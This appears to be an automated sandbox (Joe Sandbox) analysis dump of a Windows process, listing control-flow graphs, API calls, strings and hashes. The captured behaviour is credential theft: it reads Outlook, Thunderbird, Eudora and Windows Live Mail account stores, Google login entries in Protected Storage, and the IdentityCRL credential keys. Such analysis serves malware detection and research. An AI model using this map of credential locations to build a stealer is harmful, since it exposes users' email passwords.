calls 34244 43fdc5 17 API calls 34430 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34247 4161cb memcpy memcpy memcpy memcpy 33216 44b3cf 33217 44b3e6 33216->33217 33219 44b454 33216->33219 33217->33219 33223 44b40e 33217->33223 33220 44b405 33220->33219 33221 44b435 VirtualProtect 33220->33221 33221->33219 33222 44b444 VirtualProtect 33221->33222 33222->33219 33224 44b413 33223->33224 33226 44b454 33224->33226 33230 44b42b 33224->33230 33227 44b41c 33227->33226 33228 44b435 VirtualProtect 33227->33228 33228->33226 33229 44b444 VirtualProtect 33228->33229 33229->33226 33231 44b431 33230->33231 33232 44b435 VirtualProtect 33231->33232 33234 44b454 33231->33234 33233 44b444 VirtualProtect 33232->33233 33232->33234 33233->33234 34435 43ffc8 18 API calls 34248 4281cc 15 API calls __fprintf_l 34437 4383cc 110 API calls __fprintf_l 34249 4275d3 41 API calls 34438 4153d3 22 API calls __fprintf_l 34250 444dd7 _XcptFilter 34443 4013de 15 API calls 34445 425115 111 API calls __fprintf_l 34446 43f7db 18 API calls 34449 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34252 4335ee 16 API calls __fprintf_l 34451 429fef 11 API calls 34253 444deb _exit _c_exit 34452 40bbf0 138 API calls 34256 425115 79 API calls __fprintf_l 34456 437ffa 22 API calls 34260 4021ff 14 API calls 34261 43f5fc 149 API calls 34457 40e381 9 API calls 34263 405983 40 API calls 34264 42b186 27 API calls __fprintf_l 34265 427d86 76 API calls 34266 403585 20 API calls 34268 42e58e 18 API calls __fprintf_l 34271 425115 75 API calls __fprintf_l 34273 401592 8 API calls 33202 410b92 33205 410a6b 33202->33205 33204 410bb2 33206 410a77 33205->33206 33207 410a89 GetPrivateProfileIntA 33205->33207 33210 410983 memset _itoa WritePrivateProfileStringA 33206->33210 33207->33204 33209 410a84 33209->33204 33210->33209 34461 434395 16 API calls 34275 441d9c memcmp 34463 43f79b 119 API calls 34276 40c599 43 API calls 34464 426741 87 API calls 34280 4401a6 21 API calls 34282 426da6 memcpy memset memset memcpy 34283 4335a5 15 API calls 34285 4299ab memset memset memcpy memset memset 34286 40b1ab 8 API calls 34469 425115 76 API calls __fprintf_l 34473 4113b2 18 API calls 2 library calls 34477 40a3b8 memset sprintf SendMessageA 33235 410bbc 33238 4109cf 33235->33238 33239 4109dc 33238->33239 33240 410a23 memset GetPrivateProfileStringA 33239->33240 33241 4109ea memset 33239->33241 33246 407646 strlen 33240->33246 33251 4075cd sprintf memcpy 33241->33251 33244 410a0c WritePrivateProfileStringA 33245 410a65 33244->33245 33247 40765a 33246->33247 33249 40765c 33246->33249 33247->33245 33248 4076a3 33248->33245 33249->33248 33252 40737c strtoul 33249->33252 33251->33244 33252->33249 34288 40b5bf memset memset _mbsicmp

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                            APIs
                                            • memset.MSVCRT ref: 0040832F
                                            • memset.MSVCRT ref: 00408343
                                            • memset.MSVCRT ref: 0040835F
                                            • memset.MSVCRT ref: 00408376
                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                            • strlen.MSVCRT ref: 004083E9
                                            • strlen.MSVCRT ref: 004083F8
                                            • memcpy.MSVCRT ref: 0040840A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                            • String ID: 5$H$O$b$i$}$}
                                            • API String ID: 1832431107-3760989150
                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 449 407f89-407f8f 446->449 450 407f83 447->450 451 407f76-407f81 call 4070e3 447->451 448->446 454 407f86-407f88 450->454 451->454 454->449
                                            APIs
                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                            • strlen.MSVCRT ref: 00407F5C
                                            • strlen.MSVCRT ref: 00407F64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileFindstrlen$FirstNext
                                            • String ID: ACD
                                            • API String ID: 379999529-620537770
                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 00401E8B
                                            • strlen.MSVCRT ref: 00401EA4
                                            • strlen.MSVCRT ref: 00401EB2
                                            • strlen.MSVCRT ref: 00401EF8
                                            • strlen.MSVCRT ref: 00401F06
                                            • memset.MSVCRT ref: 00401FB1
                                            • atoi.MSVCRT ref: 00401FE0
                                            • memset.MSVCRT ref: 00402003
                                            • sprintf.MSVCRT ref: 00402030
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • memset.MSVCRT ref: 00402086
                                            • memset.MSVCRT ref: 0040209B
                                            • strlen.MSVCRT ref: 004020A1
                                            • strlen.MSVCRT ref: 004020AF
                                            • strlen.MSVCRT ref: 004020E2
                                            • strlen.MSVCRT ref: 004020F0
                                            • memset.MSVCRT ref: 00402018
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            • _mbscpy.MSVCRT ref: 00402177
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                            • API String ID: 1846531875-4223776976
                                            • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                            • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                            • API String ID: 745651260-375988210
                                            • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                            • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                            • _mbscpy.MSVCRT ref: 00403E54
                                            Strings
                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                            • pstorec.dll, xrefs: 00403C30
                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                            • PStoreCreateInstance, xrefs: 00403C44
                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                            • API String ID: 1197458902-317895162
                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT ref: 0040FBE4
                                            • memcpy.MSVCRT ref: 0040FBF9
                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                            • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                            • API String ID: 2768085393-2409096184
                                            • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                            • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 261 444c8c-444c93 257->261 258->252 259 444ca5-444ca7 258->259 262 444cad-444cb0 259->262 261->252 265 444c95-444c9d 261->265 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                            • String ID:
                                            • API String ID: 3662548030-0
                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0044430B
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                            • memset.MSVCRT ref: 00444379
                                            • memset.MSVCRT ref: 00444394
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                            • strlen.MSVCRT ref: 004443DB
                                            • _strcmpi.MSVCRT ref: 00444401
                                            Strings
                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                            • Store Root, xrefs: 004443A5
                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                            • API String ID: 832325562-2578778931
                                            • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                            • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                            APIs
                                            • memset.MSVCRT ref: 0040F567
                                            • memset.MSVCRT ref: 0040F57F
                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT ref: 0040F652
                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                            • String ID:
                                            • API String ID: 2012582556-3916222277
                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                            APIs
                                            • memset.MSVCRT ref: 004037EB
                                            • memset.MSVCRT ref: 004037FF
                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                            • strchr.MSVCRT ref: 0040386E
                                            • _mbscpy.MSVCRT ref: 0040388B
                                            • strlen.MSVCRT ref: 00403897
                                            • sprintf.MSVCRT ref: 004038B7
                                            • _mbscpy.MSVCRT ref: 004038CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                            • String ID: %s@yahoo.com
                                            • API String ID: 317221925-3288273942
                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 360 404ae8-404aea 358->360 360->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                            APIs
                                            • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                            • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadMessageProc
                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                            • API String ID: 2780580303-317687271
                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                            APIs
                                            • memset.MSVCRT ref: 00403504
                                            • memset.MSVCRT ref: 0040351A
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • _mbscpy.MSVCRT ref: 00403555
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 0040356D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                            • API String ID: 3071782539-966475738
                                            • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                            • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
